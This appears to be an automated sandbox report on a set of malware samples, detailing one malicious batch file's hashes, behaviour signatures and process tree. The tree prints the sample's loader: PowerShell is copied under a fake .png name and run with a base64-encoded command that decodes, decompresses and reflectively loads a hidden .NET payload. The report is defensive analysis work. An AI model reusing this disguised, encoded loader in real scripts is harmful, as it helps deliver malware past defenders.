Overview
overview
10Static
static
10f33535fb28...a7.exe
windows7-x64
10f33535fb28...a7.exe
windows10-2004-x64
10f3476b5441...96.exe
windows7-x64
10f3476b5441...96.exe
windows10-2004-x64
10f479112f0f...e2.msi
windows7-x64
7f479112f0f...e2.msi
windows10-2004-x64
8f64398ee74...a4.exe
windows7-x64
10f64398ee74...a4.exe
windows10-2004-x64
10f672ba8bf0...6f.exe
windows7-x64
10f672ba8bf0...6f.exe
windows10-2004-x64
10f92501ffd4...76.exe
windows7-x64
10f92501ffd4...76.exe
windows10-2004-x64
10fa20559cba...8e.exe
windows7-x64
10fa20559cba...8e.exe
windows10-2004-x64
10fa98feb0fc...05.exe
windows7-x64
7fa98feb0fc...05.exe
windows10-2004-x64
7fb1c133bb4...90.exe
windows7-x64
10fb1c133bb4...90.exe
windows10-2004-x64
10fbce724386...fe.exe
windows7-x64
10fbce724386...fe.exe
windows10-2004-x64
10fc82f1f187...54.exe
windows7-x64
10fc82f1f187...54.exe
windows10-2004-x64
10fd03ea32f5...54.exe
windows7-x64
7fd03ea32f5...54.exe
windows10-2004-x64
7fe21006be0...ea.exe
windows7-x64
10fe21006be0...ea.exe
windows10-2004-x64
10fe53c0822d...00.elf
debian-9-armhf
1fe6b8e0d18...a4.exe
windows7-x64
10fe6b8e0d18...a4.exe
windows10-2004-x64
10ff53a80edb...60.bat
windows7-x64
7ff53a80edb...60.bat
windows10-2004-x64
7ffbd6ffb75...4e.exe
windows7-x64
10Analysis
-
max time kernel
117s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
10-10-2023 13:04
Behavioral task
behavioral1
Sample
f33535fb2813fbfee8e03ea80d11b1a9007db801ec8b6261277377c35d233ba7.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
f33535fb2813fbfee8e03ea80d11b1a9007db801ec8b6261277377c35d233ba7.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
f3476b5441c34dfe8ca745464622aea4a00cb1196861a6972d66c38f50b2f096.exe
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
f3476b5441c34dfe8ca745464622aea4a00cb1196861a6972d66c38f50b2f096.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
f64398ee74ab5760caccfef93c615d537375c92241c15d2ea09fd402138786a4.exe
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
f64398ee74ab5760caccfef93c615d537375c92241c15d2ea09fd402138786a4.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
f672ba8bf05715a07351bf661588fcc42a13f814b4b6c3c9ea3519d35861a86f.exe
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
f672ba8bf05715a07351bf661588fcc42a13f814b4b6c3c9ea3519d35861a86f.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
f92501ffd4feea52666cbf60a5fe88c6583c1264680cf53950739370686fd776.exe
Resource
win7-20230831-en
Behavioral task
behavioral12
Sample
f92501ffd4feea52666cbf60a5fe88c6583c1264680cf53950739370686fd776.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
fa20559cbae909b4b7307dc6dc7a10ecd482af8ff4f2fd588f950185d5695d8e.exe
Resource
win7-20230831-en
Behavioral task
behavioral14
Sample
fa20559cbae909b4b7307dc6dc7a10ecd482af8ff4f2fd588f950185d5695d8e.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
fa98feb0fc8ff8b25659427c063181b1d05600900959b0eb4f478a0688d7f105.exe
Resource
win7-20230831-en
Behavioral task
behavioral16
Sample
fa98feb0fc8ff8b25659427c063181b1d05600900959b0eb4f478a0688d7f105.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
fb1c133bb4d681619adff92051b62f07da505ca6f15906b4fbb125bd65b1f190.exe
Resource
win7-20230831-en
Behavioral task
behavioral18
Sample
fb1c133bb4d681619adff92051b62f07da505ca6f15906b4fbb125bd65b1f190.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
fbce72438627da5767059d2f925ac2a318283149c77cd507a7b82ddb614fc6fe.exe
Resource
win7-20230831-en
Behavioral task
behavioral20
Sample
fbce72438627da5767059d2f925ac2a318283149c77cd507a7b82ddb614fc6fe.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral21
Sample
fc82f1f187a911727bd8bac3ab3c8aeba9eec12c9b9445547cf7c56b2097b954.exe
Resource
win7-20230831-en
Behavioral task
behavioral22
Sample
fc82f1f187a911727bd8bac3ab3c8aeba9eec12c9b9445547cf7c56b2097b954.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral23
Sample
fd03ea32f520aa57ee6b4e29eedf1c897857f9368933c2bb3367d2016dc27454.exe
Resource
win7-20230831-en
Behavioral task
behavioral24
Sample
fd03ea32f520aa57ee6b4e29eedf1c897857f9368933c2bb3367d2016dc27454.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral25
Sample
fe21006be0bc93da7054954bbd0ff37fc8ec20c4bb7984234a900589c2d5cbea.exe
Resource
win7-20230831-en
Behavioral task
behavioral26
Sample
fe21006be0bc93da7054954bbd0ff37fc8ec20c4bb7984234a900589c2d5cbea.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral27
Sample
fe53c0822d0b31a92436603f7f1d8892ecc21e43b5524767f83e93f05af0f500.elf
Resource
debian9-armhf-20230831-en
Behavioral task
behavioral28
Sample
fe6b8e0d183bf1cf3105a86efd5d70110afd4a05ddcfc7555bb2053f08812fa4.exe
Resource
win7-20230831-en
Behavioral task
behavioral29
Sample
fe6b8e0d183bf1cf3105a86efd5d70110afd4a05ddcfc7555bb2053f08812fa4.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral30
Sample
ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660.bat
Resource
win7-20230831-en
Behavioral task
behavioral31
Sample
ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660.bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral32
Sample
ffbd6ffb75e77b342f3caa7729254ef5dc198c783a78310d74923fd86ce4614e.exe
Resource
win7-20230831-en
General
-
Target
ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660.bat
-
Size
1013KB
-
MD5
356726c6ef766005db80ef2f8c0ace6f
-
SHA1
78aefea292bf9397cc4d4987af6f700da8bfafd2
-
SHA256
ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660
-
SHA512
75182a0f3c20c4541be7de7df84f1683064c2ed6b8f134e9d3bc8f717ba9d96632fccdd76c243c70ab9ab42c9e327d6a3b12eb712f902117007270d0b1b23548
-
SSDEEP
24576:Vf4Q9sdKUubPFgGuaD13/2pLe/jWw0tyKTo6W:BTbPbEaMEKPW
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2144 Pkvdtkqtj.png -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2144 Pkvdtkqtj.png -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2144 Pkvdtkqtj.png -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2144 Pkvdtkqtj.png -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 2584 wrote to memory of 2688 2584 cmd.exe 28 PID 2584 wrote to memory of 2688 2584 cmd.exe 28 PID 2584 wrote to memory of 2688 2584 cmd.exe 28 PID 2584 wrote to memory of 2700 2584 cmd.exe 29 PID 2584 wrote to memory of 2700 2584 cmd.exe 29 PID 2584 wrote to memory of 2700 2584 cmd.exe 29 PID 2584 wrote to memory of 2384 2584 cmd.exe 30 PID 2584 wrote to memory of 2384 2584 cmd.exe 30 PID 2584 wrote to memory of 2384 2584 cmd.exe 30 PID 2384 wrote to memory of 2640 2384 cmd.exe 32 PID 2384 wrote to memory of 2640 2384 cmd.exe 32 PID 2384 wrote to memory of 2640 2384 cmd.exe 32 PID 2384 wrote to memory of 2452 2384 cmd.exe 33 PID 2384 wrote to memory of 2452 2384 cmd.exe 33 PID 2384 wrote to memory of 2452 2384 cmd.exe 33 PID 2384 wrote to memory of 2984 2384 cmd.exe 35 PID 2384 wrote to memory of 2984 2384 cmd.exe 35 PID 2384 wrote to memory of 2984 2384 cmd.exe 35 PID 2384 wrote to memory of 2612 2384 cmd.exe 34 PID 2384 wrote to memory of 2612 2384 cmd.exe 34 PID 2384 wrote to memory of 2612 2384 cmd.exe 34 PID 2384 wrote to memory of 2144 2384 cmd.exe 36 PID 2384 wrote to memory of 2144 2384 cmd.exe 36 PID 2384 wrote to memory of 2144 2384 cmd.exe 36 PID 2384 wrote to memory of 2144 2384 cmd.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:2688
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Pkvdtkqtj.png2⤵PID:2700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2640
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Pkvdtkqtj.png3⤵PID:2452
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Users\Admin\AppData\Local\Temp\ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660.bat C:\Users\Admin\AppData\Local\Temp\Pkvdtkqtj.png.bat3⤵PID:2612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\Pkvdtkqtj.pngC:\Users\Admin\AppData\Local\Temp\Pkvdtkqtj.png -win 1 -enc JABNAGgAcQBhAHMAagAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABMAGkAbgBlAHMAKAAoACgAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAIgAuAGIAYQB0ACIAKQAsACAAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBsAGEAcwB0ACAAMQA7ACAAJABHAHcAbQBmAHQAcwBvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBoAHEAYQBzAGoAKQA7ACQASgBvAHAAcgB5AHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEcAdwBtAGYAdABzAG8AcgAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABGAGgAaQBwAG8AcAB1ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEoAbwBwAHIAeQByACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABGAGgAaQBwAG8AcAB1AC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApADsAJABGAGgAaQBwAG8AcAB1AC4AQwBsAG8AcwBlACgAKQA7ACQASgBvAHAAcgB5AHIALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABHAHcAbQBmAHQAcwBvAHIAIAA9ACAAJABvAHUAdABwAHUAdAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQARwB3AG0AZgB0AHMAbwByACkAOwAgACQAUABxAGQAawBpAHYAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABHAHcAbQBmAHQAcwBvAHIAKQA7ACAAJABEAGMAdABjAG0AIAA9ACAAJABQAHEAZABrAGkAdgBzAC4ARwBlAHQARQB4AHAAbwByAHQAZQBkAFQAeQBwAGUAcwAoACkAWwAwAF0AOwAgACQATQB5AGIAbgBwAHQAIAA9ACAAJABEAGMAdABjAG0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f